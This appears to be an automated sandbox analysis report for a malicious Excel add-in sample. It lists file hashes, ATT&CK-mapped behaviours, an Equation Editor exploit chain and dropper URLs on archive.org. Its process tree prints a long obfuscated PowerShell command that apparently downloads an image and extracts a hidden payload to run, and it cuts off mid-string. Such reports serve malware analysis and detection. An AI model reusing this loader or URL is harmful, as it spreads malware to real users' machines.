52af06d8b69b7428ec98ded0ef029397f0974de6a8424d53f0c645a65d9d6667

General

Target

52af06d8b69b7428ec98ded0ef029397f0974de6a8424d53f0c645a65d9d6667.xlam
Size

701KB
MD5

0857a9fd10fecac6b8b5a4c8326bc21f
SHA1

975e8d9502ca8f0a35c9399f8c4e9208a6b2894e
SHA256

52af06d8b69b7428ec98ded0ef029397f0974de6a8424d53f0c645a65d9d6667
SHA512

bcea750ec75bc500b649a124ea33551f4e13c05c075ee97b949d588a86f17b0acd21a4f48cf45a41ebc86d1e606348ec369a57c6bdad595c0241ec42572170ea
SSDEEP

12288:L5kbOpJe9BYI20Dg2nT7gQs8WyMSgMYvx9Shuv5AlBstNa/s/byr0M4:9TeW00STTu3YYv6FBstU/Abyri

Score

10^/10

discovery execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg

exe.dropper

https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg

Signatures

Blocklisted process makes network request 3 IoCs

flow	pid	Process
3	1696	EQNEDT32.EXE
7	2568	powershell.exe
8	2568	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2244	powershell.exe
2568	powershell.exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EQNEDT32.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EXCEL.EXE

Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

Launches Equation Editor 1 TTPs 1 IoCs

Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

exploit

Exploitation for Client Execution

T1203

pid	Process
1696	EQNEDT32.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
2260	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2244	powershell.exe
2568	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2244	powershell.exe
Token: SeDebugPrivilege	2568	powershell.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
2260	EXCEL.EXE
2260	EXCEL.EXE
2260	EXCEL.EXE

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 1696 wrote to memory of 2792	1696	EQNEDT32.EXE	30
PID 1696 wrote to memory of 2792	1696	EQNEDT32.EXE	30
PID 1696 wrote to memory of 2792	1696	EQNEDT32.EXE	30
PID 1696 wrote to memory of 2792	1696	EQNEDT32.EXE	30
PID 2792 wrote to memory of 2244	2792	WScript.exe	31
PID 2792 wrote to memory of 2244	2792	WScript.exe	31
PID 2792 wrote to memory of 2244	2792	WScript.exe	31
PID 2792 wrote to memory of 2244	2792	WScript.exe	31
PID 2244 wrote to memory of 2568	2244	powershell.exe	33
PID 2244 wrote to memory of 2568	2244	powershell.exe	33
PID 2244 wrote to memory of 2568	2244	powershell.exe	33
PID 2244 wrote to memory of 2568	2244	powershell.exe	33

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\52af06d8b69b7428ec98ded0ef029397f0974de6a8424d53f0c645a65d9d6667.xlam
1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2260

C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
PID:1696
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\MPDW-constraints.vbs"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2792
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J⬠ ⏨ ₣ ⦫ ⻈Bp⬠ ⏨ ₣ ⦫ ⻈G0⬠ ⏨ ₣ ⦫ ⻈YQBn⬠ ⏨ ₣ ⦫ ⻈GU⬠ ⏨ ₣ ⦫ ⻈VQBy⬠ ⏨ ₣ ⦫ ⻈Gw⬠ ⏨ ₣ ⦫ ⻈I⬠ ⏨ ₣ ⦫ ⻈⬠ ⏨ ₣ ⦫ ⻈9⬠ ⏨ ₣ ⦫ ⻈C⬠ ⏨ ₣ ⦫ ⻈⬠ ⏨ ₣ ⦫ ⻈JwBo⬠ ⏨ ₣ ⦫ ⻈HQ⬠ ⏨ ₣ ⦫ ⻈d⬠ ⏨ ₣ ⦫ ⻈Bw⬠ ⏨ ₣ ⦫ ⻈HM⬠ ⏨ ₣ ⦫ ⻈Og⬠ ⏨ ₣ ⦫ ⻈v⬠ ⏨ ₣ ⦫ ⻈C8⬠ ⏨ ₣ ⦫ ⻈aQBh⬠ ⏨ ₣ ⦫ ⻈Dg⬠ ⏨ ₣ ⦫ ⻈M⬠ ⏨ ₣ ⦫ ⻈⬠ ⏨ ₣ ⦫ ⻈z⬠ ⏨ ₣ ⦫ ⻈DE⬠ ⏨ ₣ ⦫ ⻈M⬠ ⏨ ₣ ⦫ ⻈⬠ ⏨ ₣ ⦫ ⻈0⬠ ⏨ ₣ ⦫ ⻈C4⬠ ⏨ ₣ ⦫ ⻈dQBz⬠ ⏨ ₣ ⦫ ⻈C4⬠ ⏨ ₣ ⦫ ⻈YQBy⬠ ⏨ ₣ ⦫ ⻈GM⬠ ⏨ ₣ ⦫ ⻈a⬠ ⏨ ₣ ⦫ ⻈Bp⬠ ⏨ ₣ ⦫ ⻈HY⬠ ⏨ ₣ ⦫ ⻈ZQ⬠ ⏨ ₣ ⦫ ⻈u⬠ ⏨ ₣ ⦫ ⻈G8⬠ ⏨ ₣ ⦫ ⻈cgBn⬠ ⏨ ₣ ⦫ ⻈C8⬠ ⏨ ₣ ⦫ ⻈Mg⬠ ⏨ ₣ ⦫ ⻈3⬠ ⏨ ₣ ⦫ ⻈C8⬠ ⏨ ₣ ⦫ ⻈aQB0⬠ ⏨ ₣ ⦫ ⻈GU⬠ ⏨ ₣ ⦫ ⻈bQBz⬠ ⏨ ₣ ⦫ ⻈C8⬠ ⏨ ₣ ⦫ ⻈dgBi⬠ ⏨ ₣ ⦫ ⻈HM⬠ ⏨ ₣ ⦫ ⻈Xw⬠ ⏨ ₣ ⦫ ⻈y⬠ ⏨ ₣ ⦫ ⻈D⬠ ⏨ ₣ ⦫ ⻈⬠ ⏨ ₣ ⦫ ⻈Mg⬠ ⏨ ₣ ⦫ ⻈0⬠ ⏨ ₣ ⦫ ⻈D⬠ ⏨ ₣ ⦫ ⻈⬠ ⏨ ₣ ⦫ ⻈Nw⬠ ⏨ ₣ ⦫ ⻈y⬠ ⏨ ₣ ⦫ ⻈DY⬠ ⏨ ₣ ⦫ ⻈Xw⬠ ⏨ ₣ ⦫ ⻈y⬠ ⏨ ₣ ⦫ ⻈D⬠ ⏨ ₣ ⦫ ⻈⬠ ⏨ ₣ ⦫ ⻈Mg⬠ ⏨ ₣ ⦫ ⻈0⬠ ⏨ ₣ ⦫ ⻈D⬠ ⏨ ₣ ⦫ ⻈⬠ ⏨ ₣ ⦫ ⻈Nw⬠ ⏨ ₣ ⦫ ⻈y⬠ ⏨ ₣ ⦫ ⻈DY⬠ ⏨ ₣ ⦫ ⻈LwB2⬠ ⏨ ₣ ⦫ ⻈GI⬠ ⏨ ₣ ⦫ ⻈cw⬠ ⏨ ₣ ⦫ ⻈u⬠ ⏨ ₣ ⦫ ⻈Go⬠ ⏨ ₣ ⦫ ⻈c⬠ ⏨ ₣ ⦫ ⻈Bn⬠ ⏨ ₣ ⦫ ⻈Cc⬠ ⏨ ₣ ⦫ ⻈Ow⬠ ⏨ ₣ ⦫ ⻈k⬠ ⏨ ₣ ⦫ ⻈Hc⬠ ⏨ ₣ ⦫ ⻈ZQBi⬠ ⏨ ₣ ⦫ ⻈EM⬠ ⏨ ₣ ⦫ ⻈b⬠ ⏨ ₣ ⦫ ⻈Bp⬠ ⏨ ₣ ⦫ ⻈GU⬠ ⏨ ₣ ⦫ ⻈bgB0⬠ ⏨ ₣ ⦫ ⻈C⬠ ⏨ ₣ ⦫ ⻈⬠ ⏨ ₣ ⦫ ⻈PQ⬠ ⏨ ₣ ⦫ ⻈g⬠ ⏨ ₣ ⦫ ⻈E4⬠ ⏨ ₣ ⦫ ⻈ZQB3⬠ ⏨ ₣ ⦫ ⻈C0⬠ ⏨ ₣ ⦫ ⻈TwBi⬠ ⏨ ₣ ⦫ ⻈Go⬠ ⏨ ₣ ⦫ ⻈ZQBj⬠ ⏨ ₣ ⦫ ⻈HQ⬠ ⏨ ₣ ⦫ ⻈I⬠ ⏨ ₣ ⦫ ⻈BT⬠ ⏨ ₣ ⦫ ⻈Hk⬠ ⏨ ₣ ⦫ ⻈cwB0⬠ ⏨ ₣ ⦫ ⻈GU⬠ ⏨ ₣ ⦫ ⻈bQ⬠ ⏨ ₣ ⦫ ⻈u⬠ ⏨ ₣ ⦫ ⻈E4⬠ ⏨ ₣ ⦫ ⻈ZQB0⬠ ⏨ ₣ ⦫ ⻈C4⬠ ⏨ ₣ ⦫ ⻈VwBl⬠ ⏨ ₣ ⦫ ⻈GI⬠ ⏨ ₣ ⦫ ⻈QwBs⬠ ⏨ ₣ ⦫ ⻈Gk⬠ ⏨ ₣ ⦫ ⻈ZQBu⬠ ⏨ ₣ ⦫ ⻈HQ⬠ ⏨ ₣ ⦫ ⻈Ow⬠ ⏨ ₣ ⦫ ⻈k⬠ ⏨ ₣ ⦫ ⻈Gk⬠ ⏨ ₣ ⦫ ⻈bQBh⬠ ⏨ ₣ ⦫ ⻈Gc⬠ ⏨ ₣ ⦫ ⻈ZQBC⬠ ⏨ ₣ ⦫ ⻈Hk⬠ ⏨ ₣ ⦫ ⻈d⬠ ⏨ ₣ ⦫ ⻈Bl⬠ ⏨ ₣ ⦫ ⻈HM⬠ ⏨ ₣ ⦫ ⻈I⬠ ⏨ ₣ ⦫ ⻈⬠ ⏨ ₣ ⦫ ⻈9⬠ ⏨ ₣ ⦫ ⻈C⬠ ⏨ ₣ ⦫ ⻈⬠ ⏨ ₣ ⦫ ⻈J⬠ ⏨ ₣ ⦫ ⻈B3⬠ ⏨ ₣ ⦫ ⻈GU⬠ ⏨ ₣ ⦫ ⻈YgBD⬠ ⏨ ₣ ⦫ ⻈Gw⬠ ⏨ ₣ ⦫ ⻈aQBl⬠ ⏨ ₣ ⦫ ⻈G4⬠ ⏨ ₣ ⦫ ⻈d⬠ ⏨ ₣ ⦫ ⻈⬠ ⏨ ₣ ⦫ ⻈u⬠ ⏨ ₣ ⦫ ⻈EQ⬠ ⏨ ₣ ⦫ ⻈bwB3⬠ ⏨ ₣ ⦫ ⻈G4⬠ ⏨ ₣ ⦫ ⻈b⬠ ⏨ ₣ ⦫ ⻈Bv⬠ ⏨ ₣ ⦫ ⻈GE⬠ ⏨ ₣ ⦫ ⻈Z⬠ ⏨ ₣ ⦫ ⻈BE⬠ ⏨ ₣ ⦫ ⻈GE⬠ ⏨ ₣ ⦫ ⻈d⬠ ⏨ ₣ ⦫ ⻈Bh⬠ ⏨ ₣ ⦫ ⻈Cg⬠ ⏨ ₣ ⦫ ⻈J⬠ ⏨ ₣ ⦫ ⻈Bp⬠ ⏨ ₣ ⦫ ⻈G0⬠ ⏨ ₣ ⦫ ⻈YQBn⬠ ⏨ ₣ ⦫ ⻈GU⬠ ⏨ ₣ ⦫ ⻈VQBy⬠ ⏨ ₣ ⦫ ⻈Gw⬠ ⏨ ₣ ⦫ ⻈KQ⬠ ⏨ ₣ ⦫ ⻈7⬠ ⏨ ₣ ⦫ ⻈CQ⬠ ⏨ ₣ ⦫ ⻈aQBt⬠ ⏨ ₣ ⦫ ⻈GE⬠ ⏨ ₣ ⦫ ⻈ZwBl⬠ ⏨ ₣ ⦫ ⻈FQ⬠ ⏨ ₣ ⦫ ⻈ZQB4⬠ ⏨ ₣ ⦫ ⻈HQ⬠ ⏨ ₣ ⦫ ⻈I⬠ ⏨ ₣ ⦫ ⻈⬠ ⏨ ₣ ⦫ ⻈9⬠ ⏨ ₣ ⦫ ⻈C⬠ ⏨ ₣ ⦫ ⻈⬠ ⏨ ₣ ⦫ ⻈WwBT⬠ ⏨ ₣ ⦫ ⻈Hk⬠ ⏨ ₣ ⦫ ⻈cwB0⬠ ⏨ ₣ ⦫ ⻈GU⬠ ⏨ ₣ ⦫ ⻈bQ⬠ ⏨ ₣ ⦫ ⻈u⬠ ⏨ ₣ ⦫ ⻈FQ⬠ ⏨ ₣ ⦫ ⻈ZQB4⬠ ⏨ ₣ ⦫ ⻈HQ⬠ ⏨ ₣ ⦫ ⻈LgBF⬠ ⏨ ₣ ⦫ ⻈G4⬠ ⏨ ₣ ⦫ ⻈YwBv⬠ ⏨ ₣ ⦫ ⻈GQ⬠ ⏨ ₣ ⦫ ⻈aQBu⬠ ⏨ ₣ ⦫ ⻈Gc⬠ ⏨ ₣ ⦫ ⻈XQ⬠ ⏨ ₣ ⦫ ⻈6⬠ ⏨ ₣ ⦫ ⻈Do⬠ ⏨ ₣ ⦫ ⻈VQBU⬠ ⏨ ₣ ⦫ ⻈EY⬠ ⏨ ₣ ⦫ ⻈O⬠ ⏨ ₣ ⦫ ⻈⬠ ⏨ ₣ ⦫ ⻈u⬠ ⏨ ₣ ⦫ ⻈Ec⬠ ⏨ ₣ ⦫ ⻈ZQB0⬠ ⏨ ₣ ⦫ ⻈FM⬠ ⏨ ₣ ⦫ ⻈d⬠ ⏨ ₣ ⦫ ⻈By⬠ ⏨ ₣ ⦫ ⻈Gk⬠ ⏨ ₣ ⦫ ⻈bgBn⬠ ⏨ ₣ ⦫ ⻈Cg⬠ ⏨ ₣ ⦫ ⻈J⬠ ⏨ ₣ ⦫ ⻈Bp⬠ ⏨ ₣ ⦫ ⻈G0⬠ ⏨ ₣ ⦫ ⻈YQBn⬠ ⏨ ₣ ⦫ ⻈GU⬠ ⏨ ₣ ⦫ ⻈QgB5⬠ ⏨ ₣ ⦫ ⻈HQ⬠ ⏨ ₣ ⦫ ⻈ZQBz⬠ ⏨ ₣ ⦫ ⻈Ck⬠ ⏨ ₣ ⦫ ⻈Ow⬠ ⏨ ₣ ⦫ ⻈k⬠ ⏨ ₣ ⦫ ⻈HM⬠ ⏨ ₣ ⦫ ⻈d⬠ ⏨ ₣ ⦫ ⻈Bh⬠ ⏨ ₣ ⦫ ⻈HI⬠ ⏨ ₣ ⦫ ⻈d⬠ ⏨ ₣ ⦫ ⻈BG⬠ ⏨ ₣ ⦫ ⻈Gw⬠ ⏨ ₣ ⦫ ⻈YQBn⬠ ⏨ ₣ ⦫ ⻈C⬠ ⏨ ₣ ⦫ ⻈⬠ ⏨ ₣ ⦫ ⻈PQ⬠ ⏨ ₣ ⦫ ⻈g⬠ ⏨ ₣ ⦫ ⻈Cc⬠ ⏨ ₣ ⦫ ⻈P⬠ ⏨ ₣ ⦫ ⻈⬠ ⏨ ₣ ⦫ ⻈8⬠ ⏨ ₣ ⦫ ⻈EI⬠ ⏨ ₣ ⦫ ⻈QQBT⬠ ⏨ ₣ ⦫ ⻈EU⬠ ⏨ ₣ ⦫ ⻈Ng⬠ ⏨ ₣ ⦫ ⻈0⬠ ⏨ ₣ ⦫ ⻈F8⬠ ⏨ ₣ ⦫ ⻈UwBU⬠ ⏨ ₣ ⦫ ⻈EE⬠ ⏨ ₣ ⦫ ⻈UgBU⬠ ⏨ ₣ ⦫ ⻈D4⬠ ⏨ ₣ ⦫ ⻈Pg⬠ ⏨ ₣ ⦫ ⻈n⬠ ⏨ ₣ ⦫ ⻈Ds⬠ ⏨ ₣ ⦫ ⻈J⬠ ⏨ ₣ ⦫ ⻈Bl⬠ ⏨ ₣ ⦫ ⻈G4⬠ ⏨ ₣ ⦫ ⻈Z⬠ ⏨ ₣ ⦫ ⻈BG⬠ ⏨ ₣ ⦫ ⻈Gw⬠ ⏨ ₣ ⦫ ⻈YQBn⬠ ⏨ ₣ ⦫ ⻈C⬠ ⏨ ₣ ⦫ ⻈⬠ ⏨ ₣ ⦫ ⻈PQ⬠ ⏨ ₣ ⦫ ⻈g⬠ ⏨ ₣ ⦫ ⻈Cc⬠ ⏨ ₣ ⦫ ⻈P⬠ ⏨ ₣ ⦫ ⻈⬠ ⏨ ₣ ⦫ ⻈8⬠ ⏨ ₣ ⦫ ⻈EI⬠ ⏨ ₣ ⦫ ⻈QQBT⬠ ⏨ ₣ ⦫ ⻈EU⬠ ⏨ ₣ ⦫ ⻈Ng⬠ ⏨ ₣ ⦫ ⻈0⬠ ⏨ ₣ ⦫ ⻈F8⬠ ⏨ ₣ ⦫ ⻈RQBO⬠ ⏨ ₣ ⦫ ⻈EQ⬠ ⏨ ₣ ⦫ ⻈Pg⬠ ⏨ ₣ ⦫ ⻈+⬠ ⏨ ₣ ⦫ ⻈Cc⬠ ⏨ ₣ ⦫ ⻈Ow⬠ ⏨ ₣ ⦫ ⻈k⬠ ⏨ ₣ ⦫ ⻈HM⬠ ⏨ ₣ ⦫ ⻈d⬠ ⏨ ₣ ⦫ ⻈Bh⬠ ⏨ ₣ ⦫ ⻈HI⬠ ⏨ ₣ ⦫ ⻈d⬠ ⏨ ₣ ⦫ ⻈BJ⬠ ⏨ ₣ ⦫ ⻈G4⬠ ⏨ ₣ ⦫ ⻈Z⬠ ⏨ ₣ ⦫ ⻈Bl⬠ ⏨ ₣ ⦫ ⻈Hg⬠ ⏨ ₣ ⦫ ⻈I⬠ ⏨ ₣ ⦫ ⻈⬠ ⏨ ₣ ⦫ ⻈9⬠ ⏨ ₣ ⦫ ⻈C⬠ ⏨ ₣ ⦫ ⻈⬠ ⏨ ₣ ⦫ ⻈J⬠ ⏨ ₣ ⦫ ⻈Bp⬠ ⏨ ₣ ⦫ ⻈G0⬠ ⏨ ₣ ⦫ ⻈YQBn⬠ ⏨ ₣ ⦫ ⻈GU⬠ ⏨ ₣ ⦫ ⻈V⬠ ⏨ ₣ ⦫ ⻈Bl⬠ ⏨ ₣ ⦫ ⻈Hg⬠ ⏨ ₣ ⦫ ⻈d⬠ ⏨ ₣ ⦫ ⻈⬠ ⏨ ₣ ⦫ ⻈u⬠ ⏨ ₣ ⦫ ⻈Ek⬠ ⏨ ₣ ⦫ ⻈bgBk⬠ ⏨ ₣ ⦫ ⻈GU⬠ ⏨ ₣ ⦫ ⻈e⬠ ⏨ ₣ ⦫ ⻈BP⬠ ⏨ ₣ ⦫ ⻈GY⬠ ⏨ ₣ ⦫ ⻈K⬠ ⏨ ₣ ⦫ ⻈⬠ ⏨ ₣ ⦫ ⻈k⬠ ⏨ ₣ ⦫ ⻈HM⬠ ⏨ ₣ ⦫ ⻈d⬠ ⏨ ₣ ⦫ ⻈Bh⬠ ⏨ ₣ ⦫ ⻈HI⬠ ⏨ ₣ ⦫ ⻈d⬠ ⏨ ₣ ⦫ ⻈BG⬠ ⏨ ₣ ⦫ ⻈Gw⬠ ⏨ ₣ ⦫ ⻈YQBn⬠ ⏨ ₣ ⦫ ⻈Ck⬠ ⏨ ₣ ⦫ ⻈Ow⬠ ⏨ ₣ ⦫ ⻈k⬠ ⏨ ₣ ⦫ ⻈GU⬠ ⏨ ₣ ⦫ ⻈bgBk⬠ ⏨ ₣ ⦫ ⻈Ek⬠ ⏨ ₣ ⦫ ⻈bgBk⬠ ⏨ ₣ ⦫ ⻈GU⬠ ⏨ ₣ ⦫ ⻈e⬠ ⏨ ₣ ⦫ ⻈⬠ ⏨ ₣ ⦫ ⻈g⬠ ⏨ ₣ ⦫ ⻈D0⬠ ⏨ ₣ ⦫ ⻈I⬠ ⏨ ₣ ⦫ ⻈⬠ ⏨ ₣ ⦫ ⻈k⬠ ⏨ ₣ ⦫ ⻈Gk⬠ ⏨ ₣ ⦫ ⻈bQBh⬠ ⏨ ₣ ⦫ ⻈Gc⬠ ⏨ ₣ ⦫ ⻈ZQBU⬠ ⏨ ₣ ⦫ ⻈GU⬠ ⏨ ₣ ⦫ ⻈e⬠ ⏨ ₣ ⦫ ⻈B0⬠ ⏨ ₣ ⦫ ⻈C4⬠ ⏨ ₣ ⦫ ⻈SQBu⬠ ⏨ ₣ ⦫ ⻈GQ⬠ ⏨ ₣ ⦫ ⻈ZQB4⬠ ⏨ ₣ ⦫ ⻈E8⬠ ⏨ ₣ ⦫ ⻈Zg⬠ ⏨ ₣ ⦫ ⻈o⬠ ⏨ ₣ ⦫ ⻈CQ⬠ ⏨ ₣ ⦫ ⻈ZQBu⬠ ⏨ ₣ ⦫ ⻈GQ⬠ ⏨ ₣ ⦫ ⻈RgBs⬠ ⏨ ₣ ⦫ ⻈GE⬠ ⏨ ₣ ⦫ ⻈Zw⬠ ⏨ ₣ ⦫ ⻈p⬠ ⏨ ₣ ⦫ ⻈Ds⬠ ⏨ ₣ ⦫ ⻈J⬠ ⏨ ₣ ⦫ ⻈Bz⬠ ⏨ ₣ ⦫ ⻈HQ⬠ ⏨ ₣ ⦫ ⻈YQBy⬠ ⏨ ₣ ⦫ ⻈HQ⬠ ⏨ ₣ ⦫ ⻈SQBu⬠ ⏨ ₣ ⦫ ⻈GQ⬠ ⏨ ₣ ⦫ ⻈ZQB4⬠ ⏨ ₣ ⦫ ⻈C⬠ ⏨ ₣ ⦫ ⻈⬠ ⏨ ₣ ⦫ ⻈LQBn⬠ ⏨ ₣ ⦫ ⻈GU⬠ ⏨ ₣ ⦫ ⻈I⬠ ⏨ ₣ ⦫ ⻈⬠ ⏨ ₣ ⦫ ⻈w⬠ ⏨ ₣ ⦫ ⻈C⬠ ⏨ ₣ ⦫ ⻈⬠ ⏨ ₣ ⦫ ⻈LQBh⬠ ⏨ ₣ ⦫ ⻈G4⬠ ⏨ ₣ ⦫ ⻈Z⬠ ⏨ ₣ ⦫ ⻈⬠ ⏨ ₣ ⦫ ⻈g⬠ ⏨ ₣ ⦫ ⻈CQ⬠ ⏨ ₣ ⦫ ⻈ZQBu⬠ ⏨ ₣ ⦫ ⻈GQ⬠ ⏨ ₣ ⦫ ⻈SQBu⬠ ⏨ ₣ ⦫ ⻈GQ⬠ ⏨ ₣ ⦫ ⻈ZQB4⬠ ⏨ ₣ ⦫ ⻈C⬠ ⏨ ₣ ⦫ ⻈⬠ ⏨ ₣ ⦫ ⻈LQBn⬠ ⏨ ₣ ⦫ ⻈HQ⬠ ⏨ ₣ ⦫ ⻈I⬠ ⏨ ₣ ⦫ ⻈⬠ ⏨ ₣ ⦫ ⻈k⬠ ⏨ ₣ ⦫ ⻈HM⬠ ⏨ ₣ ⦫ ⻈d⬠ ⏨ ₣ ⦫ ⻈Bh⬠ ⏨ ₣ ⦫ ⻈HI⬠ ⏨ ₣ ⦫ ⻈d⬠ ⏨ ₣ ⦫ ⻈BJ⬠ ⏨ ₣ ⦫ ⻈G4⬠ ⏨ ₣ ⦫ ⻈Z⬠ ⏨ ₣ ⦫ ⻈Bl⬠ ⏨ ₣ ⦫ ⻈Hg⬠ ⏨ ₣ ⦫ ⻈Ow⬠ ⏨ ₣ ⦫ ⻈k⬠ ⏨ ₣ ⦫ ⻈HM⬠ ⏨ ₣ ⦫ ⻈d⬠ ⏨ ₣ ⦫ ⻈Bh⬠ ⏨ ₣ ⦫ ⻈HI⬠ ⏨ ₣ ⦫ ⻈d⬠ ⏨ ₣ ⦫ ⻈BJ⬠ ⏨ ₣ ⦫ ⻈G4⬠ ⏨ ₣ ⦫ ⻈Z⬠ ⏨ ₣ ⦫ ⻈Bl⬠ ⏨ ₣ ⦫ ⻈Hg⬠ ⏨ ₣ ⦫ ⻈I⬠ ⏨ ₣ ⦫ ⻈⬠ ⏨ ₣ ⦫ ⻈r⬠ ⏨ ₣ ⦫ ⻈D0⬠ ⏨ ₣ ⦫ ⻈I⬠ ⏨ ₣ ⦫ ⻈⬠ ⏨ ₣ ⦫ ⻈k⬠ ⏨ ₣ ⦫ ⻈HM⬠ ⏨ ₣ ⦫ ⻈d⬠ ⏨ ₣ ⦫ ⻈Bh⬠ ⏨ ₣ ⦫ ⻈HI⬠ ⏨ ₣ ⦫ ⻈d⬠ ⏨ ₣ ⦫ ⻈BG⬠ ⏨ ₣ ⦫ ⻈Gw⬠ ⏨ ₣ ⦫ ⻈YQBn⬠ ⏨ ₣ ⦫ ⻈C4⬠ ⏨ ₣ ⦫ ⻈T⬠ ⏨ ₣ ⦫ ⻈Bl⬠ ⏨ ₣ ⦫ ⻈G4⬠ ⏨ ₣ ⦫ ⻈ZwB0⬠ ⏨ ₣ ⦫ ⻈Gg⬠ ⏨ ₣ ⦫ ⻈Ow⬠ ⏨ ₣ ⦫ ⻈k⬠ ⏨ ₣ ⦫ ⻈GI⬠ ⏨ ₣ ⦫ ⻈YQBz⬠ ⏨ ₣ ⦫ ⻈GU⬠ ⏨ ₣ ⦫ ⻈Ng⬠ ⏨ ₣ ⦫ ⻈0⬠ ⏨ ₣ ⦫ ⻈Ew⬠ ⏨ ₣ ⦫ ⻈ZQBu⬠ ⏨ ₣ ⦫ ⻈Gc⬠ ⏨ ₣ ⦫ ⻈d⬠ ⏨ ₣ ⦫ ⻈Bo⬠ ⏨ ₣ ⦫ ⻈C⬠ ⏨ ₣ ⦫ ⻈⬠ ⏨ ₣ ⦫ ⻈PQ⬠ ⏨ ₣ ⦫ ⻈g⬠ ⏨ ₣ ⦫ ⻈CQ⬠ ⏨ ₣ ⦫ ⻈ZQBu⬠ ⏨ ₣ ⦫ ⻈GQ⬠ ⏨ ₣ ⦫ ⻈SQBu⬠ ⏨ ₣ ⦫ ⻈GQ⬠ ⏨ ₣ ⦫ ⻈ZQB4⬠ ⏨ ₣ ⦫ ⻈C⬠ ⏨ ₣ ⦫ ⻈⬠ ⏨ ₣ ⦫ ⻈LQ⬠ ⏨ ₣ ⦫ ⻈g⬠ ⏨ ₣ ⦫ ⻈CQ⬠ ⏨ ₣ ⦫ ⻈cwB0⬠ ⏨ ₣ ⦫ ⻈GE⬠ ⏨ ₣ ⦫ ⻈cgB0⬠ ⏨ ₣ ⦫ ⻈Ek⬠ ⏨ ₣ ⦫ ⻈bgBk⬠ ⏨ ₣ ⦫ ⻈GU⬠ ⏨ ₣ ⦫ ⻈e⬠ ⏨ ₣ ⦫ ⻈⬠ ⏨ ₣ ⦫ ⻈7⬠ ⏨ ₣ ⦫ ⻈CQ⬠ ⏨ ₣ ⦫ ⻈YgBh⬠ ⏨ ₣ ⦫ ⻈HM⬠ ⏨ ₣ ⦫ ⻈ZQ⬠ ⏨ ₣ ⦫ ⻈2⬠ ⏨ ₣ ⦫ ⻈DQ⬠ ⏨ ₣ ⦫ ⻈QwBv⬠ ⏨ ₣ ⦫ ⻈G0⬠ ⏨ ₣ ⦫ ⻈bQBh⬠ ⏨ ₣ ⦫ ⻈G4⬠ ⏨ ₣ ⦫ ⻈Z⬠ ⏨ ₣ ⦫ ⻈⬠ ⏨ ₣ ⦫ ⻈g⬠ ⏨ ₣ ⦫ ⻈D0⬠ ⏨ ₣ ⦫ ⻈I⬠ ⏨ ₣ ⦫ ⻈⬠ ⏨ ₣ ⦫ ⻈k⬠ ⏨ ₣ ⦫ ⻈Gk⬠ ⏨ ₣ ⦫ ⻈bQBh⬠ ⏨ ₣ ⦫ ⻈Gc⬠ ⏨ ₣ ⦫ ⻈ZQBU⬠ ⏨ ₣ ⦫ ⻈GU⬠ ⏨ ₣ ⦫ ⻈e⬠ ⏨ ₣ ⦫ ⻈B0⬠ ⏨ ₣ ⦫ ⻈C4⬠ ⏨ ₣ ⦫ ⻈UwB1⬠ ⏨ ₣ ⦫ ⻈GI⬠ ⏨ ₣ ⦫ ⻈cwB0⬠ ⏨ ₣ ⦫ ⻈HI⬠ ⏨ ₣ ⦫ ⻈aQBu⬠ ⏨ ₣ ⦫ ⻈Gc⬠ ⏨ ₣ ⦫ ⻈K⬠ ⏨ ₣ ⦫ ⻈⬠ ⏨ ₣ ⦫ ⻈k⬠ ⏨ ₣ ⦫ ⻈HM⬠ ⏨ ₣ ⦫ ⻈d⬠ ⏨ ₣ ⦫ ⻈Bh⬠ ⏨ ₣ ⦫ ⻈HI⬠ ⏨ ₣ ⦫ ⻈d⬠ 